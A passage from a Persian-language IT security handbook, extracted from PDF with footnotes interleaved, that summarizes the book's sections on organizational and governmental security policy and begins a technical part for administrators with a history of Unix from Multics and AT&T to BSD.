ﺑﺨﺶ ۳ﺟﻮﺍﻧﺐ ﺭﺍﻫﺒﺮﻱ ﻭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺳﺎﺯﻣﺎﻧﻲ ﭘﻮﺷﺶ ﺩﺍﺩ .ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﮔﻔﺘﻴﻢ ﺑﺎ ﻓﺮﺻﺘﻬﺎﻳﻲ ﻛﻪ ﺭﺳـﺎﻧﻪﻫـﺎﻱ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺟﺪﻳﺪ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﻨﺪ ،ﺑﻨﮕﺎﻫﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ )SMEﻫﺎ( ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺑـﻪ ﻃـﺮﻑ ﻧﻘﻄـﻪﺍﻱ
ﺣﺮﻛﺖ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺩﺭ ﺗﻮﺳﻌﺔ ﺑﺎﺯﺍﺭﻫﺎﻱ ﻓﻌﻠﻲ ﺟﻬﺎﻥ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺷﻮﻧﺪ .ﻭﺟﻮﺩ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﻨﺎﺳﺐ ﻭ ﺍﺟﺮﺍﻱ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ،
ﻣﺨﺎﻃﺮﺓ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﻭ ﻋﻤﺪﻱ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺧﻮﺍﻫﺪ ﺭﺳﺎﻧﺪ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺣﻤﻠﻪﻫﺎ ﻭ ﺗـﺮﻣﻴﻢ
ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺣﻮﺯﻩ SMEﻫﺎ ،ﻋﻨﺎﺻﺮﻱ ﭼﻮﻥ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺗﻌﺎﻣﻠﻲ ﺍﺯ ﻗﺒﻴﻞ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ .ﺍﻳـﻦ ﺑﺨـﺶ
ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺩﺍﺷﺖ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﻣﻘﺮﺭﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻣﺴﺘﺤﻜﻢ ﺭﺍ ﺩﺭ ﺣﻮﺯﺓ ﻣﺤﻴﻄﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺣﺎﻛﻢ ﻛﺮﺩ ﻭ ﮔﺴﺘﺮﺵ ﺩﺍﺩ.
ﺧﻼﺻﺔ ﺑﺨﺶ ﭘﻨﺠﻢ ﻫﻤﺮﺍﻩ ﻧﻜﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﭘﻴﺸﻴﻨﺔ ﻓﻨﻲ
ﺑﺨﺶ ۵ﺑﺎ ﻫﺪﻑ ﻛﻤﻚ ﺑﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻭ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻣﺆﺛﺮ ﻭﻇﺎﻳﻔﺸﺎﻥ ﺗﻬﻴﻪ ﺷﺪﻩ ﺍﺳـﺖ .ﺍﻳـﻦ ﺑﺨـﺶ ﺍﻃﻼﻋـﺎﺗﻲ ﻣـﺸﺮﻭﺡ
ﺩﺭﺑﺎﺭﺓ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﺩﺭ ﺳﻄﺢ ﻓﻨﻲ ﺑﺎﻻ ﺩﺭﻙ ﻭ ﭘﻴﮕﻴﺮﻱ ﺷﻮﻧﺪ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ ،ﺍﺯ ﺟﻤﻠﻪ:
•
ﺩﺳﺘﻪﺑﻨﺪﻱ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ،ﺷﺎﻣﻞ ﺭﻭﺷﻬﺎﻱ ﺣﻤﻠﻪ ﻛﻪ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ.
Cyber Space
1
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺑﺨﺶ ۴ﺭﻭﻱ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻭ ﺍﺑﺘﻜﺎﺭﻫﺎﻱ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺗﺄﻛﻴﺪ ﺩﺍﺭﺩ؛ ﻭ ﺑﻴﺎﻥ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﺑﺎﻳﺪ ﺩﺭ ﺳﻄﺢ ﺩﻭﻟﺖ ﺩﺭﻙ ﺷﻮﺩ ﻭ ﺑﻪ
ﺍﺟﺮﺍ ﺩﺭﺁﻳﺪ .ﺩﻭﻟﺖ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺧﻮﺩ ،ﻣﻮﻇﻒ ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳـﺎﺯﻱ ﻭ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﻣﻠـﻲ
ﺍﻃﻼﻋﺎﺕ ﻧﻴﺰ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻛﻨﺪ .ﺩﻭﻟﺘﻬﺎ ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﭘﻴﺶﺑﻴﻨﻲ ﻛﻨﻨﺪ ﻛﻪ ﺭﺷﺪ ﺯﻳﺮﺳﺎﺧﺖ ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﻧﻈﺎﻡ ﺣﻘﻮﻗﻲ ﺁﻧﻬﺎ ﭼﻪ ﺗـﺄﺛﻴﺮﻱ
ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺍﻳﻦ ﺑﺨﺶ ﺑﺮﺧﻲ ﺍﺯ ﺳﺆﺍﻻﺕ ﻛﻠﻴﺪﻱ ﻛﻪ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﺍﻥ ﻭ ﺭﻫﺒـﺮﺍﻥ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ ﻫـﺴﺘﻨﺪ ﺭﺍ
ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻭ ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺟﺎﻣﻌﻪ ﺟﻬﺎﻧﻲ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﺪ ﻛﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑﻌﻨـﻮﺍﻥ ﺭﺍﻫﻨﻤـﺎ ﺑـﺮﺍﻱ ﻛـﺴﺎﻧﻲ ﻛـﻪ ﺩﺭﮔﻴـﺮ
ﺗﻼﺷﻬﺎﻱ ﺟﺪﻳﺪ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺑﺮﺍﻱ ﻓﻀﺎﻱ ﻣﺠﺎﺯﻱ ١ﻫﺴﺘﻨﺪ ﺑﻜﺎﺭ ﺁﻳﺪ.
٢٥٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
•
ﻛﻨﺘﺮﻝ ﺗﺮﺍﻓﻴﻚ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺣﺴﺎﺱ ﻭ ﺷﺒﻜﻪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﺮﺍﻱ ﺣﻤﻠﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺩﺭﺻـﻮﺭﺕ ﺍﻣﻜـﺎﻥ
ﺩﻓﻊ ﺷﻮﻧﺪ.
٢
ﺍﺭﺯﺷﮕﺬﺍﺭﻱ ﻧﺘﺎﻳﺞ ﺍﺭﺯﻳﺎﺑﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺯﻣﺎﻧﻴﻜﻪ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻓﺮﺁﻳﻨﺪﻫﺎ ﺩﺭﺣﺎﻝ ﺗﻮﻟﻴﺪ ﺷﺪﻥ ﻫﺴﺘﻨﺪ ﻭ ﺗﺤﻠﻴـﻞ ﻧﺘـﺎﻳﺞ ﺛﺒﺘﻬـﺎ ﻭ ﺳـﺎﻳﺮ
ﻣﺪﺍﺭﻙ ﺟﺎﺭﻱ ﺑﻌﺪ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ.
ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻳﻚ ﺣﻤﻠﻪ ،ﺗﺮﻣﻴﻢ ﻳﻚ ﻧﻔﻮﺫ ،ﻭ ﻳﺎﺩﮔﻴﺮﻱ ﺍﺯ ﺗﺠﺮﺑﻴﺎﺕ ﮔﺬﺷﺘﻪ.
•
•
ﺑﺨﺶ ۵ﺑﺎ ﭼﻬﺎﺭ ﺑﺨﺶ ﺩﻳﮕﺮ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺯ ﺁﻥ ﺟﻬﺖ ﺗﻔﺎﻭﺕ ﺩﺍﺭﺩ ﻛﻪ ﻓﺮﺽ ﻣﻲﻛﻨﺪ ﺧﻮﺍﻧﻨﺪﻩ ﺍﺯ ﺳﻄﺢ ﻣﻌﻴﻨﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻓﻨﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ
ﺍﺳﺖ .ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻣﻔﺎﻫﻴﻢ ﺑﻪ ﻭﺿﻮﺡ ﺷﺮﺡ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ ﻭ ﻫﺮﺟﺎ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺍﺷﺘﻪ ﻣﺜﺎﻟﻬﺎﺋﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ ،ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳـﻦ ﺑﺨـﺶ ﺑـﺮﺍﻱ
ﺍﻓﺮﺍﺩﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺍﺳﺖ ﻛﻪ ﺗﺠﺮﺑﺔ ﻛﺎﻓﻲ ﻛﺎﺭ ﺑﺎ ﺳﻴﺴﺘﻢ ﻭ ﺭﺍﻫﺒﺮﻱ ﺁﻥ ﺩﺍﺭﻧﺪ )ﻳﺎ ﺣﺪﺍﻗﻞ ﺑـﺴﻴﺎﺭ ﻋﻼﻗـﻪﻣﻨـﺪ ﺑـﻪ ﺁﻥ ﻫـﺴﺘﻨﺪ( .ﺑـﻪ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ
ﻋﻼﻗﻪﻣﻨﺪ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﺍﺯ ﺿﻤﺎﺋﻢ ﻛﺘﺎﺏ ﻛﻪ ﺑﻪ ﻣﺂﺧﺬ ﺍﺭﺯﺷﻤﻨﺪ ﻓﺮﺍﻭﺍﻧﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﻧﮕﻬﺪﺍﺭﻱ ﺭﺍﻳﺎﻧﻪ ﻭ ﺷﺒﻜﻪ ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻨﺪ.
ﻧﻈﺮ ﺑﻪ ﺍﻳﻨﻜﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻣﻌﻤﻮ ﹰ
ﻻ ﺑﻪ ﻣﺤﻴﻄﻬﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﺭﺍﻳﺎﻧﻪ ﻣﺮﺑﻮﻁ ﻫﺴﺘﻨﺪ ،ﺑﺨﺶ ۵ﺷﺎﻣﻞ ﻗﺴﻤﺘﻬﺎﻳﻲ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﻛـﻪ ﻣـﺴﺎﺋﻞ
ﺍﻣﻨﻴﺘﻲ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻋﻤﺪﻩ ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ .ﮔﺮﭼﻪ ﻗﺴﻤﺖ ﻋﻤﺪﺓ ﺑﺨﺶ ۵ﺗﺎ
ﺟﺎﻳﻲ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺍﺷﺘﻪ ﻏﻴﺮ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺳﺖ ،ﺍﻣﺎ ﮔﺎﻫﻲ ﺍﺭﺟﺎﻉﻫﺎﻳﻲ ﻧﻴﺰ ﺑﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ،Unix ،Microsoft Windows
،Mac OS X ،Linuxﻭ ﺳﺎﻳﺮ ﮔﻮﻧﻪﻫﺎﻱ Unixﺭﻭﻣﻴﺰﻱ ٣ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭ ﻫﻤﺔ ﻣﻮﺍﺭﺩ ﺗﻮﺻﻴﻪﻫـﺎﻱ ﺭﻭﺷـﻨﻲ ﺩﺭﺑـﺎﺭﻩ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﻛـﻪ
ﻣﻲﺗﻮﺍﻥ ﻭ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑﻪﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻥ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻤﻲ ﺍﻧﺠﺎﻡ ﺩﺍﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ.
Unix
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ Unixﻭ ﺷﺒﻪ Unixﻣﺘﻨﻮﻋﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ )ﻛﻪ ﮔﺎﻩ ﻛﺎﻣ ﹰﻼ ﺑﺎ ﻫﻢ ﻣﺘﻔﺎﻭﺗﻨـﺪ( ﻭ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺘﻔﺎﻭﺗﻲ ﺗﻮﺯﻳـﻊ ﻣـﻲﺷـﻮﻧﺪ.
ﺩﻟﻴﻞ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻭ ﺗﺄﺛﻴﺮﺍﺕ ﺁﻥ ﻣﺴﺘﻠﺰﻡ ﻳﻚ ﻣﺮﻭﺭ ﻣﺨﺘﺼﺮ ﺗﺎﺭﻳﺨﻲ ﺍﺳﺖ.
ﺭﻳﺸﻪﻫﺎﻱ Unixﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ ﺑﻪ ﻃﺮﺡ Multicsﺩﺭ ﺍﻭﺍﺳﻂ ﺳـﺎﻟﻬﺎﻱ .۱۹۶۰ﺍﻳـﻦ ﭘـﺮﻭﮊﻩ ﻛـﻪ ﺑﻮﺳـﻴﻠﻪ ﺳـﺎﺯﻣﺎﻥ ﻃﺮﺣﻬـﺎﻱ ﺗﺤﻘﻴﻘـﺎﺗﻲ
ﭘﻴﺸﺮﻓﺘﻪ ﻭﺯﺍﺭﺕ ﺩﻓﺎﻉ ﺍﻳﺎﻟﺖ ﻣﺘﺤﺪﻩ ) DARPAﻳﺎ (ARPAﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺷﺪ ﺑﺮﺍﻱ ﺁﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻳﻜﭙﺎﺭﭼﻪ ﻣﺘﺸﻜﻞ
ﺍﺯ ﺑﺎﻧﻜﻬﺎﻳﻲ ﺑﺎﺷﺪ ﻛﻪ ﺣﺎﻭﻱ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎ ،ﺣﺎﻓﻈﻪ ،ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺎ ﺳﺮﻋﺖ ﺑﺎﻻ ﺑﻮﺩﻧﺪ .ﺑﺮﺍﺳـﺎﺱ ﺍﻳـﻦ ﻃﺮﺍﺣـﻲ ،ﺑﺨـﺸﻲ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ
ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺁﻧﻜﻪ ﺭﻭﻱ ﺩﻳﮕﺮ ﻗﺴﻤﺘﻬﺎ ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺗﺄﺛﻴﺮ ﺑﮕﺬﺍﺭﺩ ،ﺑﺮﺍﻱ ﺗﻌﻤﻴﺮﺍﺕ ﺧﺎﻣﻮﺵ ﺷﻮﺩ .ﮔﺮﭼﻪ ﺍﻣﺮﻭﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﻪ ﺳﺎﺩﮔﻲ ﻣﻴﺴﺮ
ﺍﺳﺖ ،ﺍﻣﺎ ﻫﻨﮕﺎﻣﻲ ﻛﻪ Multicsﺷﺮﻭﻉ ﺑﻪ ﻛﺎﺭ ﻛﺮﺩ ﭼﻨﻴﻦ ﻗﺎﺑﻠﻴﺘﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺖ Multics .ﺑﮕﻮﻧـﻪﺍﻱ ﻃﺮﺍﺣـﻲ ﺷـﺪ ﻛـﻪ ﻫـﻢ ﺩﺭ ﺑﺮﺍﺑـﺮ
ﺣﻤﻼﺕ ﺑﻴﺮﻭﻧﻲ ﻣﻘﺎﻭﻡ ﺑﺎﺷﺪ ﻭ ﻫﻢ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺍﺧﻠﻲ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺣﻔﺎﻇﺖ ﻛﻨـﺪ Multics .ﺑـﺎ ﻫـﺪﻑ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣﻔﻬـﻮﻡ ﺍﻣﻨﻴـﺖ
ﭼﻨﺪﺳﻄﺤﻲ ٤ﻃﺮﺍﺣﻲ ﺷﺪ Multics .ﺑﺎﻻﺧﺮﻩ ﺳﻄﺤﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﺧﺪﻣﺎﺕ ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﺮﺩ ﻛﻪ ﻫﻨﻮﺯ ﻫﻢ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﺑﻪ ﺁﻥ ﻧﺮﺳﻴﺪﻩﺍﻧﺪ.
ﺩﺭﺣﺎﻟﻴﻜﻪ Multicsﺳﻌﻲ ﺩﺍﺷﺖ ﻛﺎﺭﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺍﻧﺠﺎﻡ ﺩﻫﺪ Unix ،ﺗﻼﺵ ﻣﻲﻛﺮﺩ ﻳﻚ ﻛﺎﺭ ﺭﺍ ﺧﻮﺏ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ :ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪﻫـﺎ.
"ﺍﻣﻨﻴﺖ ﻗﻮﻱ" ﺑﺨﺸﻲ ﺍﺯ ﺍﻳﻦ ﻫﺪﻑ ﻧﺒﻮﺩ .ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺑﺮﺍﺳﺎﺱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻓﺸﺮﺩﻩﺳﺎﺯﻱﺷﺪﻩ ﻣﻮﺳﻮﻡ ﺑﻪ ﺍﺑﺰﺍﺭﻫﺎ ٥ﻛﺎﺭ ﻣﻲﻛﺮﺩ ﻛـﻪ ﻫﺮﻛـﺪﺍﻡ
ﻋﻤﻠﻴﺎﺕ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩﻱ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﺍﺩﻧـﺪ .ﺷـﺮﻛﺖ ﺗﻠﻔـﻦ ﻭ ﺗﻠﮕـﺮﺍﻑ ﺁﻣﺮﻳﻜـﺎ ) ٦(AT&Tﺩﺭ ﺧـﻼﻝ ﺳـﺎﻟﻬﺎﻱ ﺩﻫـﺔ ۱۹۷۰ﺍﺑﺰﺍﺭﻫـﺎ ﻭ
ﻭﻳﮋﮔﻴﻬﺎﺋﻲ ﺑﻪ ﺁﻥ ﺍﺿﺎﻓﻪ ﻛﺮﺩ .ﺩﺭ ﺳﺎﻝ ۱۹۷۳ﺗﺎﻣﺴﻮﻥ ٧ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ Unixﺭﺍ ﺑﻪ ﺯﺑﺎﻥ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ Cﻛﻪ ﺭﻳﭽﻲ ٨ﺑﻪ ﺗـﺎﺯﮔﻲ ﺁﻧـﺮﺍ
ﺍﺑﺪﺍﻉ ﻛﺮﺩﻩﺑﻮﺩ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻛﺮﺩ .ﺯﺑﺎﻥ Cﻃﻮﺭﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﻳﻚ ﺯﺑﺎﻥ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﻲ ﺳﺎﺩﻩ ﻭ ﺟﺎﺑﺠﺎﻳﻲﭘـﺬﻳﺮ ﺑﺎﺷـﺪ .ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺑﻪ ﺯﺑﺎﻥ Cﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺑﻪ ﺳﺎﺩﮔﻲ ﺍﺯ ﻳﻚ ﻧـﻮﻉ ﺭﺍﻳﺎﻧـﻪ ﺑـﻪ ﻧـﻮﻉ ﺩﻳﮕـﺮ ﻣﻨﺘﻘـﻞ ﺷـﻮﻧﺪ ،ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﺍﻳﻨﻜـﺎﺭ ﺩﺭ ﺯﺑﺎﻧﻬـﺎﻱ
Logs
Desktop Unix
Multilevel Security
Tools
American Telephone & Telegraph
Thompson
Ritchie
2
3
4
5
6
7
8
٢٥٩
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﺳﻄﺢ ﺑﺎﻻ ﻣﺜﻞ Fortranﺍﻧﺠﺎﻡﭘﺬﻳﺮ ﺑﻮﺩ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺎ ﺳﺮﻋﺖ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﺯﺑﺎﻥ ﺑـﻮﻣﻲ
ﻣﺎﺷﻴﻦ ﻛﺪﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪ ﺍﺟﺮﺍ ﻣﻲﺷﺪﻧﺪ .ﺗﺎ ﺳﺎﻝ ۱۹۷۷ﺑﻴﺶ ﺍﺯ ۵۰۰ﺍﺩﺍﺭﻩ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ؛ ۱۲۵ﺍﺩﺍﺭﻩ ﻋﺒﺎﺭﺕ
ﺑﻮﺩﻧﺪ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭ ﺑﻴﺶ ﺍﺯ ۱۰ﻛﺸﻮﺭ ﺧﺎﺭﺟﻲ ﺩﻳﮕﺮ.
ﺗﻮﺳﻌﻪ ﺩﺭ ﻧﻘﺎﻁ ﻣﺨﺘﻠﻔﻲ ﺍﺩﺍﻣﻪ ﻳﺎﻓﺖ؛ ﺍﺯ ﺟﻤﻠﻪ ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﻟﻴﻔﺮﻧﻴﺎ ﺩﺭ ﺑﺮﻛﻠﻲ ،ﻛـﻪ ﮔـﺴﺘﺮﺵ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺑﺮﻛﻠـﻲ ) - ٩(BSDﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ
ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺗﻐﻴﻴﺮﺍﺕ ﺩﺭ ﺳﻴﺴﺘﻢ - Unixﺭﺍ ﻣﻨﺘﺸﺮ ﻛﺮﺩ .ﺩﺭ ۶ﺳﺎﻝ ﺑﻌﺪﻱ ،ﺩﺭ ﻓﻌﺎﻟﻴﺘﻲ ﻛﻪ ﺗﻮﺳﻂ ARPAﺭﻭﻱ ﺁﻥ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﺷـﺪ،
ﺁﻧﭽﻪ ﺗﺎ ﺁﻧﺰﻣﺎﻥ BSD Unixﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﺪ ﺗﺎ ﺣﺪ ﻭ ﺍﻧﺪﺍﺯﻩﻫﺎﻱ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﺴﺘﻘﻞ ﺭﺷﺪ ﻛﺮﺩ ﻭ ﺑﺎﻋﺚ ﺍﺻﻼﺣﺎﺕ ﭼـﺸﻤﮕﻴﺮﻱ ﺩﺭ
